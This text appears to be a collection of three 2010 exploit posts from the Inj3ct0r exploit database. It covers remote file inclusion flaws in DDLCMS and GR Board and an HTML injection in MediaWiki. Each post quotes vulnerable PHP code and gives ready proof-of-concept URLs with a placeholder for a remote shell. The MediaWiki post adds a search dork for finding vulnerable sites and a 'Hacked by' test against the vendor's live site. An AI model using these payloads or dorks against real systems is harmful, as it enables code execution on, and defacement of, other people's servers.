2010/06/04

DDLCMS v2.1 (skin) Remote File Inclusion Vulnerability




1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Vendor: www.ddlcms.com
download: http://www.ddlcms.com/download.php
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

=====================================================================

-=[ Vuln Code ]=-

[-] /thanks.php

include(WWWROOT . 'skins/' . $skin . '/header.php'); // line 46
include(WWWROOT . 'leftside.php');

=====================================================================

-=[ P0C ]=-

"skin" parameter in FILE thanks.php is not Defined which can allow remote attackers to execute arbitrary PHP code via a URL

-=[ exploit ]=-

http://127.0.0.1/thanks.php?skin= [inj3ct0r sh3ll]


=========================| -=[ E0F ]=- |=========================

2010/06/01

Mediawiki (index.php) HTML Injection & unknown vulnerability issue




Vendor: www.MEDIAWIKI.ORG
download: http://www.mediawiki.org/wiki/Download
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com
Thank`s: neogabriel a.k.a Ahmed Yusuf (who have give me inspiration for this exploit)
Dork: "powered by mediawiki" inurl:"index.php?title=" 13,200,000 result (0.18 second)

=====================================================================

Description:

You can read all Description about mediawiki in www.mediawiki.org :P

=====================================================================

-=[ vuln ]=-

http://127.0.0.1/wiki/index.php?title=XSS

-=[ P0C ]=-

http://127.0.0.1/wiki/index.php?title= Hacked by eidelweiss

-=[ vendor Demo P0C ]=-

http://www.mediawiki.org/w/index.php?title= Hacked By eidelweiss

redirect to

http://www.mediawiki.org/wiki/Hacked_by_eidelweiss

Host=www.mediawiki.org
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-us,en;q=0.5
Accept-Encoding=gzip,deflate
Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive=115
Connection=keep-alive


Status=Moved Permanently - 301
Date=Tue, 01 Jun 2010 09:11:42 GMT
Server=Apache
Cache-Control=private, s-maxage=0, max-age=0, must-revalidate
Vary=Accept-Encoding,Cookie
Last-Modified=Tue, 01 Jun 2010 09:11:42 GMT
Location=http://www.mediawiki.org/wiki/Hacked_By_eidelweiss
Content-Encoding=gzip
Content-Length=20
Content-Type=text/html; charset=utf-8
X-Cache=MISS from sq75.wikimedia.org, MISS from sq72.wikimedia.org
X-Cache-Lookup=MISS from sq75.wikimedia.org:3128, MISS from sq72.wikimedia.org:80

=========================| -=[ E0F ]=- |=========================

2010/05/30

GR Board v1.8.6.1 stab (theme) Remote File Inclusion Vulnerability





download: http://sirini.net/grboard/board.php?id=grskin&articleNo=82
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com

=====================================================================

Description:

GRBoard (VERSION 1.8 )is bulletin board system of Korea.
It is freely available for all platforms that supports PHP and MySQL.
But I find Remote File Inclusion vulnerability.

=====================================================================

--=[ Vuln C0de ]=-

[-] path/page.php

-----------------------------------------------------------------------------------------

// 페이지에서 사용할 변수 부르기
$getConfigList = array('theme', 'title', 'logo', 'useOutlogin', 'outlogin', 'usePoll', 'poll');
$countList = count($getConfigList);
for($i=0; $i<$countList; $i++) $config[$getConfigList[$i]] = getVar($getConfigList[$i]);
$content = @mysql_fetch_array(mysql_query('select var from '.$dbFIX.'layout_config where opt = \'page\' and var like \''.$_GET['id'].'|%\''));
$content = str_replace($_GET['id'].'|', '', $content['var']);
$path = 'layout/'.$config['theme'];
include 'layout/'.$config['theme'].'/head.page.php'; // <= 1
?>



include 'layout/'.$config['theme'].'/foot.page.php'; // <= 2


?>

-----------------------------------------------------------------------------------------

-=[ P0C ]=-

http://127.0.0.1/path/page.php?theme= [inj3ct0r sh3ll]

=========================| -=[ E0F ]=- |=========================